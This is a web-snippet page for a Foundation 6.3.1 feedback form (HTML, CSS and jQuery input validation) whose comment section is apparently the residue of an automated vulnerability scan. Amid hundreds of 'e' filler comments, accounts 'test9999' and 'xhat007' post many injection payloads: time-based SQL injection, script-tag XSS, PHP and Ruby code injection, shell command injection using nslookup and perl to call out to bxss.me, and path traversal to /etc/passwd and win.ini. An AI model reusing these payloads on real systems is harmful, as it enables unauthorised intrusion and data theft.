"Foundation Form"
Foundation 6.3.1 Snippet by sinjie2008

<link href="//cdnjs.cloudflare.com/ajax/libs/foundation/6.3.1/css/foundation.min.css" rel="stylesheet" id="bootstrap-css"> <script src="//cdnjs.cloudflare.com/ajax/libs/foundation/6.3.1/js/foundation.min.js"></script> <script src="//code.jquery.com/jquery-1.11.1.min.js"></script> <!------ Include the above in your HEAD tag ----------> <!doctype html> <html class="no-js" lang="en" dir="ltr"> <head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Foundation for Sites</title> <link rel="stylesheet" href="css/foundation.css"> <link rel="stylesheet" href="css/app.css"> </head> <body> <section id="foundation-example"> <div style="height: 50px;background: lightblue;"></div> <div class="foundation-example__ex-wrapper"> <div class="foundation-example__in-wrapper"> <div class="foundation-example__title"> Foundation Form</div> <div class="foundation-example__form-wrapper"> <form method="post" id="Feedback" > <div class="row"> <div class="large-6 columns"> <label>Product ID <input type="text" name="product_id"> <div class="error_txt inactive" id="error_pro_id">Please provide your Product ID.</div> </label> </div> <div class="large-6 columns"> <label>Person In Charge <input type="text" name="per_in_chg" > <div class="error_txt inactive" id="error_per_in_chg">Please provide your Person In Charge.</div> </label> </div> </div> <div class="row"> <div class="large-6 columns"> <label>Name <input type="text" name="name" > <div class="error_txt inactive" id="error_name">Please provide your name.</div> </label> <label>Email <input type="text" name="email" > <div class="error_txt inactive" id="error_email">Please provide your email.</div> </label> <label>Phone <input type="text" name="phone" class="numeric allownumericwithoutdecimal"> <div class="error_txt inactive" id="error_phone">Please provide your phone.</div> </label> </div> <div class="large-6 columns"> <label>Address <textarea rows="10" name="address" ></textarea> <div class="error_txt inactive" id="error_address">Please provide your address.</div> </label> </div> </div> <div class="row"> <div class="large-12 columns"> <label>Comment <textarea rows="10" name="comment" placeholder="Comment"></textarea> <div class="error_txt inactive" id="error_comment">Please provide your comment.</div> </label> </div> </div> <div class="row"> <div class="large-12 columns text-center"> <text class="button" type="text" id="submit">submit</text> </div> </div> </form> </div> </div> </div> <div style="height: 50px;background: lightblue;"></div> </section> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script> <script src="js/vendor/jquery.js"></script> <script src="js/vendor/what-input.js"></script> <script src="js/vendor/foundation.js"></script> <script src="js/app.js"></script> </body> </html>
/*base*/ .error_txt{margin-bottom: 10px; display: block; color: #f00; font-size: 13px;} .inactive{display:none;} /*foundation-example*/ #foundation-example{} .foundation-example__ex-wrapper{ background-color: lightblue; } .foundation-example__in-wrapper{ margin: auto; max-width: 960px; background: white; padding: 30px; } .foundation-example__title{ text-align: center; font-size: 40px; margin-bottom: 32px; } .foundation-example__form-wrapper{ }
jQuery(document).foundation(); (function($) { $(function() { // Code here for active or inactive the error text. $('.numeric').keypress(function(event){ var charCode = (event.which) ? event.which : event.keyCode return !(charCode > 31 && (charCode < 48 || charCode > 57)); }); $(".allownumericwithoutdecimal").on("keypress keyup blur",function (event) { jQuery(this).val($(this).val().replace(/[^\d].+/, "")); if ((event.which < 48 || event.which > 57)) { event.preventDefault(); } }); }); })(jQuery);

Related: See More


Questions / Comments:

e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


@@zLfSX

test9999 () - 2 years ago - Reply 0


e'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

test9999 () - 2 years ago - Reply 0


1'"

test9999 () - 2 years ago - Reply 0


test9999 () - 2 years ago - Reply 0


l4Rnx5yg')) OR 769=(SELECT 769 FROM PG_SLEEP(15))--

test9999 () - 2 years ago - Reply 0


RohBYgMQ') OR 565=(SELECT 565 FROM PG_SLEEP(15))--

test9999 () - 2 years ago - Reply 0


INOSBfkB' OR 467=(SELECT 467 FROM PG_SLEEP(15))--

test9999 () - 2 years ago - Reply 0


VZiPXR5M'; waitfor delay '0:0:15' --

test9999 () - 2 years ago - Reply 0


1 waitfor delay '0:0:15' --

test9999 () - 2 years ago - Reply 0


(select(0)from(select(sleep(15)))v)/'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"/

test9999 () - 2 years ago - Reply 0


0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

test9999 () - 2 years ago - Reply 0


0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

test9999 () - 2 years ago - Reply 0


if(now()=sysdate(),sleep(15),0)

test9999 () - 2 years ago - Reply 0


-1" OR 2+68-68-1=0+0+0+1 --

test9999 () - 2 years ago - Reply 0


-1' OR 2+540-540-1=0+0+0+1 or 'fi71PUij'='

test9999 () - 2 years ago - Reply 0


uIIeAOre

test9999 () - 2 years ago - Reply 0


-1 OR 2+471-471-1=0+0+0+1 --

test9999 () - 2 years ago - Reply 0


-1 OR 2+488-488-1=0+0+0+1

test9999 () - 2 years ago - Reply 0


-1' OR 2+589-589-1=0+0+0+1 --

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e9797308

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


'"()&%<acx><ScRiPt >Zu86(9640)</ScRiPt>

test9999 () - 2 years ago - Reply 0


e'"()&%<acx><ScRiPt >Zu86(9028)</ScRiPt>

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


'.print(md5(31337)).'

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


<!--

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


${@print(md5(31337))}\

test9999 () - 2 years ago - Reply 0


'"

test9999 () - 2 years ago - Reply 0


;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


';print(md5(31337));$a='

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


";print(md5(31337));$a="

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


${@print(md5(31337))}

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


/xfs.bxss.me

test9999 () - 2 years ago - Reply 0


forumPost

test9999 () - 2 years ago - Reply 0


forumPost

test9999 () - 2 years ago - Reply 0


forumPost/.

test9999 () - 2 years ago - Reply 0


)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


'+'A'.concat(70-3).concat(22*4).concat(109).concat(79).concat(117).concat(72)+(require'socket'

Socket.gethostbyname('hitgl'+'awmqdkgx2c102.bxss.me.')[3].to_s)+'

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


"+"A".concat(70-3).concat(22*4).concat(99).concat(73).concat(114).concat(65)+(require"socket"

Socket.gethostbyname("hitcq"+"necnyflu67623.bxss.me.")[3].to_s)+"

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


bxss.me/t/xss.html?%00

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


HttP://bxss.me/t/xss.html?%00

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


http://bxss.me/t/fit.txt?.jpg

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


bxss.me

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


1some_inexistent_file_with_long_name.jpg

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


Http://bxss.me/t/fit.txt

test9999 () - 2 years ago - Reply 0


(nslookup hitsrbvlptdae9abf6.bxss.me||perl -e "gethostbyname('hitsrbvlptdae9abf6.bxss.me')")

test9999 () - 2 years ago - Reply 0


^(#$!@#$)(()))

test9999 () - 2 years ago - Reply 0


;(nslookup hitmzczuaxnivcdea9.bxss.me||perl -e "gethostbyname('hitmzczuaxnivcdea9.bxss.me')")|(nslookup hitmzczuaxnivcdea9.bxss.me||perl -e "gethostbyname('hitmzczuaxnivcdea9.bxss.me')")&(nslookup hitmzczuaxnivcdea9.bxss.me||perl -e "gethostbyname('hitmzczuaxnivcdea9.bxss.me')")

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


echo bfsxsi$()\ kssrni\nz^xyu||a #' &echo bfsxsi$()\ kssrni\nz^xyu||a #|" &echo bfsxsi$()\ kssrni\nz^xyu||a #

test9999 () - 2 years ago - Reply 0


&echo qurmak$()\ tbozqh\nz^xyu||a #' &echo qurmak$()\ tbozqh\nz^xyu||a #|" &echo qurmak$()\ tbozqh\nz^xyu||a #

test9999 () - 2 years ago - Reply 0


|echo ywsbvy$()\ xsesrr\nz^xyu||a #' |echo ywsbvy$()\ xsesrr\nz^xyu||a #|" |echo ywsbvy$()\ xsesrr\nz^xyu||a #

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


(nslookup hitjplmrcsrekd7e3d.bxss.me||perl -e "gethostbyname('hitjplmrcsrekd7e3d.bxss.me')")

test9999 () - 2 years ago - Reply 0


$(nslookup hitmhsgeclzjlc5b44.bxss.me||perl -e "gethostbyname('hitmhsgeclzjlc5b44.bxss.me')")

test9999 () - 2 years ago - Reply 0


'.gethostbyname(lc('hitby'.'xkmeugvqa4522.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(81).chr(122).chr(79).'

test9999 () - 2 years ago - Reply 0


&(nslookup hitqvniybaqgqd50a2.bxss.me||perl -e "gethostbyname('hitqvniybaqgqd50a2.bxss.me')")&'\"

0&(nslookup hitqvniybaqgqd50a2.bxss.me||perl -e "gethostbyname('hitqvniybaqgqd50a2.bxss.me')")&
'

test9999 () - 2 years ago - Reply 0


".gethostbyname(lc("hitll"."ykgbhkvha57f5.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(84).chr(103).chr(85)."

test9999 () - 2 years ago - Reply 0


)

test9999 () - 2 years ago - Reply 0


'"()

test9999 () - 2 years ago - Reply 0


|(nslookup hitnatknjjbwye70be.bxss.me||perl -e "gethostbyname('hitnatknjjbwye70be.bxss.me')")

test9999 () - 2 years ago - Reply 0


!(()&&!|||

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e&n995174=v942778

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e<esi:include src="http://bxss.me/rpb.png"/>

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


../e

test9999 () - 2 years ago - Reply 0


${9999610+9999436}

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


../../../../../../../../../../../../../../etc/passwd

test9999 () - 2 years ago - Reply 0


../../../../../../../../../../../../../../windows/win.ini

test9999 () - 2 years ago - Reply 0


"+response.write(9755950*9394134)+"

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


response.write(9755950*9394134)

test9999 () - 2 years ago - Reply 0


'+response.write(9755950*9394134)+'

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


dKUe9r1O

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

test9999 () - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


@@faFHB

xhat007 (1) - 2 years ago - Reply 0


1'"

xhat007 (1) - 2 years ago - Reply 0


xhat007 (1) - 2 years ago - Reply 0


e'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

xhat007 (1) - 2 years ago - Reply 0


ynSOxLDv')) OR 248=(SELECT 248 FROM PG_SLEEP(15))--

xhat007 (1) - 2 years ago - Reply 0


io3AKUZN') OR 64=(SELECT 64 FROM PG_SLEEP(15))--

xhat007 (1) - 2 years ago - Reply 0


G97OhX0T' OR 307=(SELECT 307 FROM PG_SLEEP(15))--

xhat007 (1) - 2 years ago - Reply 0


u780W9H2'; waitfor delay '0:0:15' --

xhat007 (1) - 2 years ago - Reply 0


1 waitfor delay '0:0:15' --

xhat007 (1) - 2 years ago - Reply 0


(select(0)from(select(sleep(15)))v)/'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"/

xhat007 (1) - 2 years ago - Reply 0


0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

xhat007 (1) - 2 years ago - Reply 0


0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

xhat007 (1) - 2 years ago - Reply 0


if(now()=sysdate(),sleep(15),0)

xhat007 (1) - 2 years ago - Reply 0


-1" OR 2+372-372-1=0+0+0+1 --

xhat007 (1) - 2 years ago - Reply 0


-1' OR 2+568-568-1=0+0+0+1 or 'oWKOBPVE'='

xhat007 (1) - 2 years ago - Reply 0


-1' OR 2+893-893-1=0+0+0+1 --

xhat007 (1) - 2 years ago - Reply 0


-1 OR 2+269-269-1=0+0+0+1

xhat007 (1) - 2 years ago - Reply 0


-1 OR 2+754-754-1=0+0+0+1 --

xhat007 (1) - 2 years ago - Reply 0


UODZ2rE3

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e9977733

xhat007 (1) - 2 years ago - Reply 0


'"()&%<acx><ScRiPt >0c82(9431)</ScRiPt>

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e'"()&%<acx><ScRiPt >0c82(9843)</ScRiPt>

xhat007 (1) - 2 years ago - Reply 0


<!--

xhat007 (1) - 2 years ago - Reply 0


'"

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


/xfs.bxss.me

xhat007 (1) - 2 years ago - Reply 0


)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


forumPost/.

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


forumPost

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


forumPost

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


${@print(md5(31337))}

xhat007 (1) - 2 years ago - Reply 0


${@print(md5(31337))}\

xhat007 (1) - 2 years ago - Reply 0


'.print(md5(31337)).'

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


'+'A'.concat(70-3).concat(22*4).concat(108).concat(71).concat(118).concat(82)+(require'socket'

Socket.gethostbyname('hitiv'+'xszfxktk4d685.bxss.me.')[3].to_s)+'

xhat007 (1) - 2 years ago - Reply 0


;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

xhat007 (1) - 2 years ago - Reply 0


';print(md5(31337));$a='

xhat007 (1) - 2 years ago - Reply 0


";print(md5(31337));$a="

xhat007 (1) - 2 years ago - Reply 0


"+"A".concat(70-3).concat(22*4).concat(108).concat(88).concat(121).concat(77)+(require"socket"

Socket.gethostbyname("hitsc"+"fgszlulu66400.bxss.me.")[3].to_s)+"

xhat007 (1) - 2 years ago - Reply 0


bxss.me/t/xss.html?%00

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


HttP://bxss.me/t/xss.html?%00

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


".gethostbyname(lc("hitif"."xoihmwmt50b7a.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(67).chr(120).chr(72)."

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


bxss.me

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


Http://bxss.me/t/fit.txt

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


http://bxss.me/t/fit.txt?.jpg

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


1some_inexistent_file_with_long_name.jpg

xhat007 (1) - 2 years ago - Reply 0


'.gethostbyname(lc('hitxs'.'ojuggkvn64d75.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(80).chr(105).chr(76).'

xhat007 (1) - 2 years ago - Reply 0


)

xhat007 (1) - 2 years ago - Reply 0


!(()&&!|||

xhat007 (1) - 2 years ago - Reply 0


^(#$!@#$)(()))

xhat007 (1) - 2 years ago - Reply 0


e&n904391=v926738

xhat007 (1) - 2 years ago - Reply 0


e

